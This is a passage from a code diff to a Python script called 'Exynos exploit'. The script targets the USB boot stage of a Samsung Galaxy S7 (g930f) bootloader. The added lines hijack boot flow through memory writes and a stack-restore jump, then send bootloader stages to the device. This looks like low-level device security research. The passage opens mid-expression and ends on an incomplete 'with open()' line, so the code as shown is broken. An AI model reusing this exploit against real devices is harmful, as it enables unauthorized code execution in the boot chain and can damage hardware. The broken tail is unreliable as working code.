storage=0x14ac4200, g_data_received=0x14ac4400) + # DEBUGGER_ADDR = 0x14ac3000 + + # Again restore bootflow + self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) + self.cd.restore_stack_and_jump(hijacked_fun) + time.sleep(2) + # ==== Stage 3 BL2 ==== self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) @@ -738,6 +773,7 @@ class ExynosDevice(): pass + if __name__ == "__main__": arg = argparse.ArgumentParser("Exynos exploit") arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False) @@ -769,3 +805,6 @@ if __name__ == "__main__": exynos.dumb_interact() sys.exit(0) + + +with open() \ No newline at end of file